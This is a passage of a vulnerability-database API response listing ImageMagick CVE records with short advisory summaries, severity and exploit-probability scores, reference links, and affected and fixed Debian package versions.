"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-10T15:57:44Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hffp-q43q-qq76" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28693", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28693" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445888", "reference_id": "2445888", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445888" }, { "reference_url": "https://github.com/advisories/GHSA-hffp-q43q-qq76", "reference_id": "GHSA-hffp-q43q-qq76", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hffp-q43q-qq76" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6713", "reference_id": "RHSA-2026:6713", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6713" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28693", "GHSA-hffp-q43q-qq76" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x8c6-9pse-xkc8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24675?format=api", "vulnerability_id": "VCID-y4hn-6bv6-jugw", "summary": "ImageMagick: MSL attribute stack buffer overflow leads to out of bounds write.\nA stack buffer overflow occurs when processing the an attribute in msl.c. A long value overflows a fixed-size stack buffer, leading to memory corruption.\n\n```\n=================================================================\n==278522==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdb8c76984 at pc 0x55a4bf16f507 bp 0x7ffdb8c75bc0 sp 0x7ffdb8c75bb0\nWRITE of size 1 at 0x7ffdb8c76984 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25968.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25968.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25968", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.18969", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19294", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19346", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19061", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19141", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19194", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19201", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19155", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.191", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19059", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.1907", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19079", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25968" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25968", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25968" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-3mwp-xqp2-q6ph", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-3mwp-xqp2-q6ph" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25968", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25968" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442125", "reference_id": "2442125", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442125" }, { "reference_url": "https://github.com/advisories/GHSA-3mwp-xqp2-q6ph", "reference_id": "GHSA-3mwp-xqp2-q6ph", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3mwp-xqp2-q6ph" }, { "reference_url": "https://usn.ubuntu.com/8069-1/", "reference_id": "USN-8069-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8069-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25968", "GHSA-3mwp-xqp2-q6ph" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y4hn-6bv6-jugw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24481?format=api", "vulnerability_id": "VCID-y58b-be93-hbfd", "summary": "ImageMagick: Write heap-buffer-overflow in PCL encoder via undersized output buffer\nA heap-buffer-overflow vulnerability exists in the PCL encode due to an undersized output buffer allocation.\n\n```\nWRITE of size 1 at 0x7e79f91f31a0 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28686.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28686.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28686", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04189", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04175", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04143", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04127", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04109", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0498", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04881", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04861", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04841", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0479", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04799", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04944", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28686" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28686", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28686" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-467j-76j7-5885", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:24:19Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-467j-76j7-5885" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28686", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28686" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445889", "reference_id": "2445889", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445889" }, { "reference_url": "https://github.com/advisories/GHSA-467j-76j7-5885", "reference_id": "GHSA-467j-76j7-5885", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-467j-76j7-5885" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28686", "GHSA-467j-76j7-5885" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y58b-be93-hbfd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22330?format=api", "vulnerability_id": "VCID-yx7r-r7ez-7uhp", "summary": "ImageMagick: Code Injection via PostScript header in ps coders\nThe ps encoders, responsible for writing PostScript files, fails to sanitize the input before writing it into the PostScript header. An attacker can provide a malicious file and inject arbitrary PostScript code. When the resulting file is processed by a printer or a viewer (like Ghostscript), the injected code is interpreted and executed.\n\nThe html encoder does not properly escape strings that are written to in the html document. An attacker can provide a malicious file and injection arbitrary html code.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25797.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25797.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25797", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.068", "published_at": "2026-04-02T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00823", "published_at": "2026-04-21T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00779", "published_at": "2026-04-18T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00775", "published_at": "2026-04-16T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00774", "published_at": "2026-04-12T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00786", "published_at": "2026-04-09T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.0079", "published_at": "2026-04-08T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00789", "published_at": "2026-04-04T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.0078", "published_at": "2026-04-11T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00826", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25797" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25797", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25797" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/26088a83d71e9daa203d54a56fe3c31f3f85463d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/26088a83d71e9daa203d54a56fe3c31f3f85463d" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-rw6c-xp26-225v", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:13:11Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-rw6c-xp26-225v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25797", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25797" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442106", "reference_id": "2442106", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442106" }, { "reference_url": "https://github.com/advisories/GHSA-rw6c-xp26-225v", "reference_id": "GHSA-rw6c-xp26-225v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rw6c-xp26-225v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25797", "GHSA-rw6c-xp26-225v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yx7r-r7ez-7uhp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21517?format=api", "vulnerability_id": "VCID-z9t9-bxf9-hkfk", "summary": "ImageMagick has memory leak of watermark Image object in ReadSTEGANOImage on multiple error/early-return paths\n### Summary\n\nIn `ReadSTEGANOImage()` (`coders/stegano.c`), the `watermark` Image object is not freed on three early-return paths, resulting in a definite memory leak (~13.5KB+ per invocation) that can be 